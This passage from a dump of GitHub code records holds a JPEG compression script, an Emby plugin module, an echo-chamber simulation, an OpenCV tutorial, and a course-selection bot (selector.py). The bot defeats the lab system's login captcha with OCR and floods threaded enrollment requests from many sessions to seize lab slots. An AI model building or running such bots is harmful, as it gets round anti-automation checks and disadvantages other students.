read_dc_table(self):\n\t\ttable = dict()\n\t\ttable_size = self.__read_uint(self.TABLE_SIZE_BITS)\n\t\tfor _ in range(table_size):\n\t\t\tcategory = self.__read_uint(self.CATEGORY_BITS)\n\t\t\tcode_length = self.__read_uint(self.DC_CODE_LENGTH_BITS)\n\t\t\tcode = self.__read_str(code_length)\n\t\t\ttable[code] = category\n\t\treturn table\n\n\tdef read_ac_table(self):\n\t\ttable = dict()\n\t\ttable_size = self.__read_uint(self.TABLE_SIZE_BITS)\n\t\tfor _ in range(table_size):\n\t\t\trun_length = self.__read_uint(self.RUN_LENGTH_BITS)\n\t\t\tsize = self.__read_uint(self.SIZE_BITS)\n\t\t\tcode_length = self.__read_uint(self.AC_CODE_LENGTH_BITS)\n\t\t\tcode = self.__read_str(code_length)\n\t\t\ttable[code] = (run_length, size)\n\t\treturn table\n\n\tdef read_blocks_count(self):\n\t\treturn self.__read_uint(self.BLOCKS_COUNT_BITS)\n\n\tdef read_huffman_code(self, table):\n\t\tprefix = ''\n\t\t# TODO: перервати цикл if __read_char не повертає новий символ\n\t\twhile prefix not in table:\n\t\t\tprefix += self.__read_char()\n\t\treturn table[prefix]\n\n\tdef __read_uint(self, size):\n\t\tif size <= 0:\n\t\t\traise ValueError(\"розмір повинен бути більшим за 0\")\n\t\treturn self.__int2(self.__read_str(size))\n\n\tdef __read_str(self, length):\n\t\treturn self.__file.read(length)\n\n\tdef __read_char(self):\n\t\treturn self.__read_str(1)\n\n\tdef __int2(self, bin_num):\n\t\treturn int(bin_num, 2)\n\n\ndef encode(output_f: str, input_f: str, table_num: int):\n\tinput_file = f\"Im_bmp/{input_f}bmp\"\n\toutput_file = f\"{output_f}.asf\"\n\timage = Image.open(input_file)\n\tycbcr = image.convert('YCbCr')\n\tnpmat = np.array(ycbcr, dtype=np.uint8)\n\trows, cols = npmat.shape[0], npmat.shape[1]\n\tif rows % 8 == cols % 8 == 0:\n\t\tblocks_count = rows // 8 * cols // 8\n\telse:\n\t\traise ValueError(\"Ширина і висота зображення мають бути кратними 8\")\n\tdc = np.empty((blocks_count, 3), dtype=np.int32)\n\tac = np.empty((blocks_count, 63, 3), dtype=np.int32)\n\tfor i in range(0, rows, 8):\n\t\tfor j in range(0, cols, 8):\n\t\t\ttry:\n\t\t\t\tblock_index += 1\n\t\t\texcept NameError:\n\t\t\t\tblock_index = 0\n\t\t\tfor k in range(3):\n\t\t\t\t# split 8x8 block and center the data range on zero\n\t\t\t\t# [0, 255] --> [-128, 127]\n\t\t\t\tblock = npmat[i:i + 8, j:j + 8, k] - 128\n\t\t\t\tdct_matrix = dct_2d(block)\n\t\t\t\tquant_matrix = quantize(dct_matrix, 'lum' if k == 0 else 'chrom', table_num)\n\t\t\t\tzigzag = block_to_zigzag(quant_matrix)\n\t\t\t\tdc[block_index, k] = zigzag[0]\n\t\t\t\tac[block_index, :, k] = zigzag[1:]\n\tH_DC_Y = HuffmanTree(np.vectorize(bits_required)(dc[:, 0]))\n\tH_DC_C = HuffmanTree(np.vectorize(bits_required)(dc[:, 1:].flat))\n\tH_AC_Y = HuffmanTree(flatten(run_length_encode(ac[i, :, 0])[0] for i in range(blocks_count)))\n\tH_AC_C = HuffmanTree(flatten(run_length_encode(ac[i, :, j])[0] for i in range(blocks_count) for j in [1, 2]))\n\ttables = {\n\t\t'dc_y': H_DC_Y.value_to_bitstring_table(),\n\t\t'ac_y': H_AC_Y.value_to_bitstring_table(),\n\t\t'dc_c': H_DC_C.value_to_bitstring_table(),\n\t\t'ac_c': H_AC_C.value_to_bitstring_table()}\n\tsize_vyhsdnogo = os.path.getsize(input_file)\n\twith open(\"results_jpeg.txt\", \"a\", encoding=\"utf8\") as file:\n\t\tprint(f'Таблиця квантування - {table_num}, зображення - {input_f}', file=file)\n\t\tprint(f'Розмір вихідного файла: {size_vyhsdnogo} байт', file=file)\n\twrite_to_file(f\"Result/{output_file}\", dc, ac, blocks_count, tables)\n\treturn size_vyhsdnogo\n\n\ndef dequantize(block, component, table_num):\n\tq = 
load_quantization_table(component, table_num)\n\treturn block * q\n\n\ndef idct_2d(image):\n\treturn fftpack.idct(fftpack.idct(image.T, norm='ortho').T, norm='ortho')\n\n\ndef zigzag_to_block(zigzag):\n\trows = cols = int(math.sqrt(len(zigzag)))\n\tif rows * cols != len(zigzag):\n\t\traise ValueError(\"Довжина зіг-зага повинна бути ідеальним квадратом \")\n\tblock = np.empty((rows, cols), np.int32)\n\tfor i, point in enumerate(zigzag_points(rows, cols)):\n\t\tblock[point] = zigzag[i]\n\treturn block\n\n\ndef read_image_file(filepath):\n\treader = JPEGFileReader(filepath)\n\ttables = dict()\n\tfor table_name in ['dc_y', 'ac_y', 'dc_c', 'ac_c']:\n\t\tif 'dc' in table_name:\n\t\t\ttables[table_name] = reader.read_dc_table()\n\t\telse:\n\t\t\ttables[table_name] = reader.read_ac_table()\n\tblocks_count = reader.read_blocks_count()\n\tdc = np.empty((blocks_count, 3), dtype=np.int32)\n\tac = np.empty((blocks_count, 63, 3), dtype=np.int32)\n\tfor block_index in range(blocks_count):\n\t\tfor component in range(3):\n\t\t\tdc_table = tables['dc_y'] if component == 0 else tables['dc_c']\n\t\t\tac_table = tables['ac_y'] if component == 0 else tables['ac_c']\n\t\t\tcategory = reader.read_huffman_code(dc_table)\n\t\t\tdc[block_index, component] = reader.read_int(category)\n\t\t\tcells_count = 0\n\t\t\t# TODO: спроба зробити читання AC коефіцієнтів краще\n\t\t\twhile cells_count < 63:\n\t\t\t\trun_length, size = reader.read_huffman_code(ac_table)\n\t\t\t\tif (run_length, size) == (0, 0):\n\t\t\t\t\twhile cells_count < 63:\n\t\t\t\t\t\tac[block_index, cells_count, component] = 0\n\t\t\t\t\t\tcells_count += 1\n\t\t\t\telse:\n\t\t\t\t\tfor _ in range(run_length):\n\t\t\t\t\t\tac[block_index, cells_count, component] = 0\n\t\t\t\t\t\tcells_count += 1\n\t\t\t\t\tif size == 0:\n\t\t\t\t\t\tac[block_index, cells_count, component] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tvalue = reader.read_int(size)\n\t\t\t\t\t\tac[block_index, cells_count, component] = value\n\t\t\t\t\tcells_count += 1\n\treturn dc, ac, tables, blocks_count\n\n\ndef uint_to_binstr(number, size):\n\treturn bin(number)[2:][-size:].zfill(size)\n\n\ndef int_to_binstr(n):\n\tif n == 0:\n\t\treturn ''\n\tbinstr = bin(abs(n))[2:]\n\treturn binstr if n > 0 else binstr_flip(binstr)\n\n\ndef binstr_flip(binstr):\n\tif not set(binstr).issubset('01'):\n\t\traise ValueError(\"binstr повинен мати лише '0' та '1'\")\n\treturn ''.join(map(lambda c: '0' if c == '1' else '1', binstr))\n\n\ndef write_to_file(filepath, dc, ac, blocks_count, tables):\n\tf = open(filepath, 'w')\n\tfor table_name in ['dc_y', 'ac_y', 'dc_c', 'ac_c']:\n\t\tf.write(uint_to_binstr(len(tables[table_name]), 16))\n\t\tfor key, value in tables[table_name].items():\n\t\t\tif table_name in {'dc_y', 'dc_c'}:\n\t\t\t\tf.write(uint_to_binstr(key, 4))\n\t\t\t\tf.write(uint_to_binstr(len(value), 4))\n\t\t\t\tf.write(value)\n\t\t\telse:\n\t\t\t\tf.write(uint_to_binstr(key[0], 4))\n\t\t\t\tf.write(uint_to_binstr(key[1], 4))\n\t\t\t\tf.write(uint_to_binstr(len(value), 8))\n\t\t\t\tf.write(value)\n\n\tf.write(uint_to_binstr(blocks_count, 32))\n\tfor b in range(blocks_count):\n\t\tfor c in range(3):\n\t\t\tcategory = bits_required(dc[b, c])\n\t\t\tsymbols, values = run_length_encode(ac[b, :, c])\n\t\t\tdc_table = tables['dc_y'] if c == 0 else tables['dc_c']\n\t\t\tac_table = tables['ac_y'] if c == 0 else tables['ac_c']\n\t\t\tf.write(dc_table[category])\n\t\t\tf.write(int_to_binstr(dc[b, c]))\n\t\t\tfor i in 
range(len(symbols)):\n\t\t\t\tf.write(ac_table[tuple(symbols[i])])\n\t\t\t\tf.write(values[i])\n\tf.close()\n\n\ndef bits_required(n):\n\tn, result = abs(n), 0\n\twhile n > 0:\n\t\tn >>= 1\n\t\tresult += 1\n\treturn result\n\n\ndef flatten(lst):\n\treturn [item for sublist in lst for item in sublist]\n\n\ndef run_length_encode(arr):\n\tlast_nonzero, run_length = -1, 0\n\tfor i, elem in enumerate(arr):\n\t\tif elem != 0:\n\t\t\tlast_nonzero = i\n\tsymbols, values = [], []\n\tfor i, elem in enumerate(arr):\n\t\tif i > last_nonzero:\n\t\t\tsymbols.append((0, 0))\n\t\t\tvalues.append(int_to_binstr(0))\n\t\t\tbreak\n\t\telif elem == 0 and run_length < 15:\n\t\t\trun_length += 1\n\t\telse:\n\t\t\tsize = bits_required(elem)\n\t\t\tsymbols.append((run_length, size))\n\t\t\tvalues.append(int_to_binstr(elem))\n\t\t\trun_length = 0\n\treturn symbols, values\n\n\ndef dct_2d(image):\n\treturn fftpack.dct(fftpack.dct(image.T, norm='ortho').T, norm='ortho')\n\n\ndef load_quantization_table(component, table_num: int):\n\tif component == 'lum':\n\t\tif table_num == 1:\n\t\t\tq = np.array([\n\t\t\t\t[2, 2, 2, 2, 3, 4, 5, 6],\n\t\t\t\t[2, 2, 2, 2, 3, 4, 5, 6],\n\t\t\t\t[2, 2, 2, 2, 4, 5, 7, 9],\n\t\t\t\t[2, 2, 2, 4, 5, 7, 9, 12],\n\t\t\t\t[3, 3, 4, 5, 8, 10, 12, 12],\n\t\t\t\t[4, 4, 5, 7, 10, 12, 12, 12],\n\t\t\t\t[5, 5, 7, 9, 12, 12, 12, 12],\n\t\t\t\t[6, 6, 9, 12, 12, 12, 12, 12]])\n\t\telif table_num == 2:\n\t\t\tq = np.array([\n\t\t\t\t[16, 11, 10, 16, 24, 40, 51, 61],\n\t\t\t\t[12, 12, 14, 19, 26, 48, 60, 55],\n\t\t\t\t[14, 13, 16, 24, 40, 57, 69, 56],\n\t\t\t\t[14, 17, 22, 29, 51, 87, 80, 62],\n\t\t\t\t[18, 22, 37, 56, 68, 109, 103, 77],\n\t\t\t\t[24, 35, 55, 64, 81, 104, 113, 92],\n\t\t\t\t[49, 64, 78, 87, 103, 121, 120, 101],\n\t\t\t\t[72, 92, 95, 98, 112, 100, 103, 99]])\n\telif component == 'chrom':\n\t\tif table_num == 1:\n\t\t\tq = np.array([\n\t\t\t\t[3, 3, 5, 9, 13, 15, 15, 15],\n\t\t\t\t[3, 4, 6, 11, 14, 12, 12, 12],\n\t\t\t\t[5, 6, 9, 14, 12, 12, 12, 12],\n\t\t\t\t[9, 11, 14, 12, 12, 12, 12, 12],\n\t\t\t\t[13, 14, 12, 12, 12, 12, 12, 12],\n\t\t\t\t[15, 12, 12, 12, 12, 12, 12, 12],\n\t\t\t\t[15, 12, 12, 12, 12, 12, 12, 12],\n\t\t\t\t[15, 12, 12, 12, 12, 12, 12, 12]])\n\t\telif table_num == 2:\n\t\t\tq = np.array([\n\t\t\t\t[17, 18, 24, 47, 99, 99, 99, 99],\n\t\t\t\t[18, 21, 26, 66, 99, 99, 99, 99],\n\t\t\t\t[24, 26, 56, 99, 99, 99, 99, 99],\n\t\t\t\t[47, 66, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99]])\n\n\telse:\n\t\traise ValueError(f\"компонент має бути \\\"lum\\\" або \\\"chrom\\\", але {component} знайдено\")\n\treturn q\n\n\ndef quantize(block, component, table_num):\n\treturn (block / load_quantization_table(component, table_num)).round().astype(np.int32)\n\n\ndef block_to_zigzag(block):\n\treturn np.array([block[point] for point in zigzag_points(*block.shape)])\n\n\ndef zigzag_points(rows, cols):\n\tup, down, right, left, up_right, down_left = range(6)\n\n\tdef move(direction, pont):\n\t\treturn {\n\t\t\tup: lambda dot: (dot[0] - 1, dot[1]),\n\t\t\tdown: lambda dot: (dot[0] + 1, dot[1]),\n\t\t\tleft: lambda dot: (dot[0], dot[1] - 1),\n\t\t\tright: lambda dot: (dot[0], dot[1] + 1),\n\t\t\tup_right: lambda dot: move(up, move(right, dot)),\n\t\t\tdown_left: lambda dot: move(down, move(left, dot))\n\t\t}[direction](pont)\n\n\tdef inbounds(pont):\n\t\treturn 0 <= pont[0] < rows and 0 <= pont[1] < cols\n\n\tpoint, move_up = (0, 0), 
True\n\tfor i in range(rows * cols):\n\t\tyield point\n\t\tif move_up:\n\t\t\tif inbounds(move(up_right, point)):\n\t\t\t\tpoint = move(up_right, point)\n\t\t\telse:\n\t\t\t\tmove_up = False\n\t\t\t\tif inbounds(move(right, point)):\n\t\t\t\t\tpoint = move(right, point)\n\t\t\t\telse:\n\t\t\t\t\tpoint = move(down, point)\n\t\telse:\n\t\t\tif inbounds(move(down_left, point)):\n\t\t\t\tpoint = move(down_left, point)\n\t\t\telse:\n\t\t\t\tmove_up = True\n\t\t\t\tif inbounds(move(down, point)):\n\t\t\t\t\tpoint = move(down, point)\n\t\t\t\telse:\n\t\t\t\t\tpoint = move(right, point)\n\n\ndef decoder(output_f: str, input_f: str, table_num: int, size_f: int):\n\tinput_file = f\"Result/{input_f}.asf\"\n\toutput_file = f\"Result/{output_f}.jpeg\"\n\tdc, ac, tables, blocks_count = read_image_file(input_file)\n\tblock_side = 8\n\timage_side = int(math.sqrt(blocks_count)) * block_side\n\tblocks_per_line = image_side // block_side\n\tnpmat = np.empty((image_side, image_side, 3), dtype=np.uint8)\n\tfor block_index in range(blocks_count):\n\t\ti = block_index // blocks_per_line * block_side\n\t\tj = block_index % blocks_per_line * block_side\n\t\tfor c in range(3):\n\t\t\tzigzag = [dc[block_index, c]] + list(ac[block_index, :, c])\n\t\t\tquant_matrix = zigzag_to_block(zigzag)\n\t\t\tdct_matrix = dequantize(quant_matrix, 'lum' if c == 0 else 'chrom', table_num)\n\t\t\tblock = idct_2d(dct_matrix)\n\t\t\tnpmat[i:i + 8, j:j + 8, c] = block + 128\n\timage = Image.fromarray(npmat, 'YCbCr')\n\timage = image.convert('RGB')\n\timage.save(output_file)\n\tsize_jpeg = os.path.getsize(output_file)\n\twidth, height = image.size\n\tratio = size_f / size_jpeg\n\twith open(\"results_jpeg.txt\", \"a\", encoding=\"utf8\") as file:\n\t\tprint(f'Розмір файла JPEG: {size_jpeg} байт', file=file)\n\t\tprint(f'Розмір зображення JPEG: {width}x{height}', file=file)\n\t\tprint(f'Коефіцієнт стиснення = {ratio}\\n', file=file)\n\n\ndef main():\n\tfiles = os.listdir(\"./Im_bmp\")\n\tfile_names = [el[:4] for el in files]\n\tfor i in range(1, 3):\n\t\tfor j in file_names:\n\t\t\tsize = encode(f\"{j}_{i}\", j, i)\n\t\t\tdecoder(f\"{j}_{i}\", f\"{j}_{i}\", i, size)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"DybkoAndrii/TIC_Dybko_529a","sub_path":"LessСompressionJPEG/lesscompression_jpeg.py","file_name":"lesscompression_jpeg.py","file_ext":"py","file_size_in_byte":12475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34263029624","text":"import xbmc\nfrom . 
import common\n\nclass Folder:\n def __init__(self, EmbyServer, embydb):\n self.EmbyServer = EmbyServer\n self.emby_db = embydb\n\n def folder(self, Item):\n if not common.library_check(Item, self.EmbyServer, self.emby_db, \"Folder\"):\n return False\n\n if 'Path' in Item and Item['Path']:\n if Item['Path'].find(\"/\") >= 0: # Linux\n Path = f\"{Item['Path']}/\"\n else: # Windows\n Path = f\"{Item['Path']}\\\\\"\n\n self.emby_db.add_reference(Item['Id'], [], [], None, \"Folder\", None, [], Item['LibraryIds'], None, None, None, Path, None, None, None)\n xbmc.log(f\"EMBY.core.folder: ADD OR REPLACE folder {Item['Id']}: {Path}\", 1) # LOGINFO\n\n return True\n\n def remove(self, Item):\n self.emby_db.remove_item(Item['Id'], Item['Library']['Id'])\n xbmc.log(f\"EMBY.core.folder: DELETE Folder {Item['Id']}\", 1) # LOGINFO\n\n def userdata(self, Item):\n xbmc.log(f\"EMBY.core.folder: USERDATA FOLDER {Item}\", 1) # LOGINFO\n self.folder(Item)\n","repo_name":"MediaBrowser/plugin.video.emby","sub_path":"core/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":278,"dataset":"github-code","pt":"77"} +{"seq_id":"1706088745","text":"# coding: utf-8\n# Echo Chamber Model\n# social_media.py\n# Last Update: 20190410\n# by Kazutoshi Sasahara\n\nimport numpy as np\nimport networkx as nx\nimport pandas as pd\n\n\nclass Message(object):\n def __init__(self, msg_id, orig_msg_id, who_posted, who_originated, content):\n self.msg_id = msg_id\n self.orig_msg_id = orig_msg_id\n self.who_posted = who_posted\n self.who_originated = who_originated\n self.content = content\n\n\n def to_dict(self):\n return {'msg_id': self.msg_id, 'orig_msg_id':self.orig_msg_id,\n 'who_posted':self.who_posted, 'who_originated':self.who_originated,\n 'content':self.content,}\n\n\n\nclass SocialMedia(object):\n def __init__(self, num_agents, num_links, l, sns_seed):\n self.num_agents = num_agents\n random_state = np.random.RandomState(sns_seed)\n self.G = nx.gnm_random_graph(n=num_agents, m=num_links, seed=random_state, directed=True)\n self.modify_random_graph()\n self.message_dic = {}\n self.message_df = pd.DataFrame(columns=['msg_id', 'orig_msg_id', 'who_posted', 'who_originated', 'content'])\n self.screen_size = l\n\n\n def modify_random_graph(self):\n for no_outdegree_node in [k for k, v in list(self.G.out_degree()) if v == 0]:\n target_node = np.random.choice([k for k, v in list(self.G.out_degree()) if v >= 2])\n i = np.random.choice(len(self.G.edges(target_node)))\n target_edge = list(self.G.edges(target_node))[i]\n self.G.remove_edge(target_edge[0], target_edge[1])\n self.G.add_edge(no_outdegree_node, target_edge[1])\n\n\n def set_node_colors(self, node_colors):\n for i, c in enumerate(node_colors):\n self.G.nodes[i]['color'] = c\n\n\n def show_screen(self, user_id):\n friends = self.G.neighbors(user_id)\n friend_message_df = self.message_df[self.message_df['who_posted'].isin(friends)]\n friend_message_df = friend_message_df[friend_message_df['who_originated'] != user_id]\n return friend_message_df.tail(self.screen_size)\n\n\n def update_message_db(self, t, msg):\n self.message_df = self.message_df.append(msg.to_dict(), ignore_index=True).tail(self.num_agents)\n \n\n def recommend_similar_users(self, user_id, epsilon, num_agents):\n similar_users = []\n my_message_df = self.message_df[self.message_df.who_originated == user_id].tail(1)\n\n if len(my_message_df) > 0:\n last_message = my_message_df.content.values[0]\n friends = 
self.G.neighbors(user_id)\n friends = list(friends)\n similar_messages_df = self.message_df[self.message_df.who_originated != user_id].tail(num_agents)\n similar_messages_df = similar_messages_df[abs(last_message - similar_messages_df.content) < epsilon]\n if len(similar_messages_df) > 0:\n similar_users = [u for u in similar_messages_df.who_originated.values if u not in friends]\n\n return similar_users\n\n\n def rewire_users(self, user_id, unfollow_id, follow_id):\n self.G.remove_edge(user_id, unfollow_id)\n self.G.add_edge(user_id, follow_id)","repo_name":"soramame0518/echo_chamber_model","sub_path":"social_media.py","file_name":"social_media.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"77"} +{"seq_id":"2335928031","text":"# -*- coding: utf-8 -*-\nimport time\nimport requests\nimport threading\nfrom datetime import datetime\n\nfrom core.ocr import OCR\nfrom core.log import logger\nfrom core.storage import config, Session\nfrom core.simple_ocr import SimpleOCR\n\n# 常量\nurl = config.net['url']\nua = config.net['user-agent']\n\n# 全局变量\nrunning = True\n\n\nclass Robber:\n def __init__(self, session: requests.Session):\n if str(config.target['type']) == '0':\n type_code = '0'\n type_str = 'bas' # 基物实验上,这里是bas\n # type_str = 'adv' # 基物实验下,这里是adv\n else:\n type_code = '1'\n type_str = 'aut' # 基物实验上,这里是aut\n # 基物实验下,不知道是什么\n\n self.rob_params = {'type': type_code, 'step': '3', 'eid': type_str + config.target['week']}\n self.rob_data = {'Result': config.target['course']}\n\n self.session = session\n\n @property\n def token(self):\n return self.session.cookies.get('PHPSESSID')\n\n def rob(self):\n t = threading.Thread(target=self._rob)\n t.start()\n return t\n\n def _rob(self):\n global running\n t0 = datetime.now()\n resp = self.session.post(url + 'elect.php', self.rob_data, params=self.rob_params)\n t1 = datetime.now()\n html = resp.content.decode('gb2312')\n if html.find(\"你还没有登录,无权访问。\") != -1:\n logger.fatal(\"[token {}][begin {}][end {}][elapse {}] Not login\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n return False\n if html.find(\"还没做吧?!\") != -1:\n logger.info(\"[token {}][begin {}][end {}][elapse {}] Early\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n return False\n if html.find(\"该组已经选满。请重试!\") != -1:\n # 选课不可能进行,停止接下来的抢课进程\n logger.warning(\"[token {}][begin {}][end {}][elapse {}] Full\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n running = False\n return False\n if html.find(\"此题目在这个时间段没有开放\") != -1:\n # 选课不可能进行,停止接下来的抢课进程\n logger.error(\"[token {}][begin {}][end {}][elapse {}] Lesson not open\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n return False\n if html.find(\"三天内课表已冻结,请换个时间段!\") != -1:\n # 选课不可能进行,停止接下来的抢课进程\n logger.error(\"[token {}][begin {}][end {}][elapse {}] Lesson expired\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n running = False\n return False\n if html.find(\"恭喜你,选课成功!\") != -1:\n # 选课完成,停止接下来的抢课进程\n logger.warning(\"[token {}][begin {}][end {}][elapse {}] 
Success\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n running = False\n return True\n\n logger.error(\"[token {}][begin {}][end {}][elapse {}] Unknown error\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n # print(html)\n\n\nclass RobberManager:\n def __init__(self):\n self.robbers = []\n self.sessions = []\n self.login()\n if config.ocr['local']:\n self.ocr = SimpleOCR()\n else:\n self.ocr = OCR()\n\n @property\n def login_data(self):\n return {\n 'txtUid': config.account['username'],\n 'txtPwd': config.account['password'],\n 'txtChk': self.checkcode\n }\n\n def _login(self):\n for retry in range(3):\n session = requests.session()\n session.headers['User-Agent'] = ua\n session.get(url + 'index.php')\n response = session.get(url + 'checkcode.php')\n img_bin = response.content\n self.checkcode = self.ocr.number_from_bytes(img_bin)\n if not self.checkcode:\n logger.info(\"Failed to get checkcode, retry:{}\".format(retry + 1))\n continue\n session.post(url + 'login.php', data=self.login_data)\n resp = session.get(url + 'elect.php')\n if resp.status_code == 200 and resp.content.decode('gb2312').find('你还没有登录,无权访问。') == -1:\n logger.info(\"Login succeed\")\n return session\n else:\n logger.info(\"Login failed, retry:{}\".format(retry + 1))\n continue\n return None\n\n @staticmethod\n def test_available(session_id):\n session = requests.session()\n session.headers['User-Agent'] = ua\n session.cookies.set('PHPSESSID', session_id)\n resp = session.get(url + 'elect.php')\n if resp.status_code == 200 and resp.content.decode('gb2312').find('你还没有登录,无权访问。') == -1:\n logger.info(\"Session is available: {}...\".format(session_id[0:10]))\n return session\n else:\n logger.info(\"Session is not available: {}...\".format(session_id[0:10]))\n return None\n\n def login(self):\n logger.warning(\"begin to get enough sessions\")\n session_ids = Session.load()\n sessions = []\n for sid in session_ids:\n session = self.test_available(sid)\n if session:\n sessions.append(session)\n if len(sessions) >= config.speed['number-of-clients']:\n break\n load_number = len(sessions)\n total_retry = 0\n total_retry_max = 5\n try:\n while len(sessions) < config.speed['number-of-clients'] and total_retry < total_retry_max:\n session = self._login()\n if session:\n sessions.append(session)\n else:\n total_retry += 1\n except KeyboardInterrupt:\n Session.dump([x.cookies.get('PHPSESSID') for x in sessions])\n exit(1)\n got = len(sessions)\n new_number = got - load_number\n logger.warning(\n \"Wants {}, got {}, loaded {}, new {}, total retry {}\".format(config.speed['number-of-clients'], got,\n load_number, new_number, total_retry))\n Session.dump([x.cookies.get('PHPSESSID') for x in sessions])\n self.sessions = sessions\n\n def logout(self):\n for session in self.sessions:\n session.get(url + 'logout.php')\n\n def rob(self):\n global running\n running = True\n self.robbers = [Robber(x) for x in self.sessions]\n interval = config.speed['interval']\n max_running_time = config.speed['max-running-time']\n start_at = time.time()\n threads = []\n try:\n while max_running_time == 0 or time.time() - start_at < max_running_time:\n for robber in self.robbers:\n if not running:\n logger.info(\"Completed\")\n logger.info(\"Waiting for running threads to finish\")\n for t in threads:\n t.join()\n return\n t = robber.rob()\n threads.append(t)\n 
time.sleep(interval)\n logger.info(\"Time Limit Exceeded\")\n logger.info(\"Waiting for running threads to finish\")\n for t in threads:\n t.join()\n except KeyboardInterrupt:\n logger.info(\"Interrupted\")\n exit(1)\n\n\n# debug\nif __name__ == '__main__':\n r = RobberManager()\n r.rob()\n","repo_name":"wwlyeye/PhysicalExperimentSelector","sub_path":"core/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"4012828414","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\n# Print Multiple images in the same figure, pyplot\ndef show_images(images, cols = 1, titles = None):\n assert((titles is None)or (len(images) == len(titles)))\n n_images = len(images)\n if titles is None: titles = ['Image (%d)' % i for i in range(1,n_images + 1)]\n fig = plt.figure()\n for n, (image, title) in enumerate(zip(images, titles)):\n a = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n if image.ndim == 2:\n plt.gray()\n plt.imshow(image)\n a.set_title(title)\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n plt.show()\n\n#from skimage import io, data\n\n# Using skimage io\n#lena = data.imread('lena.png', as_grey=True)\n#io.imshow(lena)\n\n# Load an color image in grayscale OpenCV\nimg = cv.imread('lena.png', 1)\n\n# Display image for Windows\n#cv.imshow('Lena',img)\n#cv.waitKey(0)\n#cv.destroyAllWindows()\n\n# Display for Ubuntu, using pyplot\nplt.figure(1)\nplt.imshow(img, cmap=\"gray\")\nplt.title(\"Gray Lena\")\n\n# Saving image to disk with OpenCV\ncv.imwrite(\"Lena_gray.png\", img)\n\n# Changing color spaces\n# BGR -> Gray flag is cv.COLOR_BGR2GRAY\n# BGR -> HSV flag is cv.COLOR_BGR2HSV\n# cv.cvtColor(img, flag)\n\nbgr_img = cv.imread('lena.png')\n\nb,g,r = cv.split(bgr_img) # get b,g,r\nrgb_img = cv.merge([r,g,b]) # switch it to rgb\n\ngray_img = cv.cvtColor(bgr_img, cv.COLOR_BGR2GRAY)\n\nhsv_img = cv.cvtColor(bgr_img, cv.COLOR_BGR2HSV)\n\nshow_images([rgb_img, gray_img, hsv_img], titles=['RGB', 'Gray', 'HSV'])\n\n# Transformations cv.warp_____\n\n## Scaling\n# fx and fy are resizing factors, 0.5 will result in half the size\nhalf_img = cv.resize(rgb_img, None, fx=0.5, fy=0.5, interpolation=cv.INTER_AREA)\nshow_images([rgb_img, half_img], titles=['Full','Half'])\n\n## Rotation\nrows, cols, dims = rgb_img.shape\nM = cv.getRotationMatrix2D((cols/2, rows/2), 90, 1)\nrot_img = cv.warpAffine(rgb_img, M, (cols, rows))\nshow_images([rgb_img, rot_img], titles=['Original', 'Rotated'])\n\n## Affine Transformation\n### This process takes three points from the image and their desired position\n### after transformation\npts1 = np.float32([[50, 30], [200, 50], [5, 200]])\npts2 = np.float32([[10, 100], [200, 50], [50, 250]])\n\nM = cv.getAffineTransform(pts1, pts2)\ntrans_img = cv.warpAffine(rgb_img, M, (cols, rows))\n\nshow_images([rgb_img, trans_img], titles=['Orginal', 'Transformed'])\n\n## Perspective Transformation\n### This transformation is useful to focus the image in just one section of it\n### It needs four points, and another four that will be their positions in the\n### output.\npts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]])\npts2 = np.float32([[0,0], [rows, 0], [0, cols], [rows, cols]])\n\nM = cv.getPerspectiveTransform(pts1, pts2)\nzoom_img = cv.warpPerspective(rgb_img, M, (rows, 
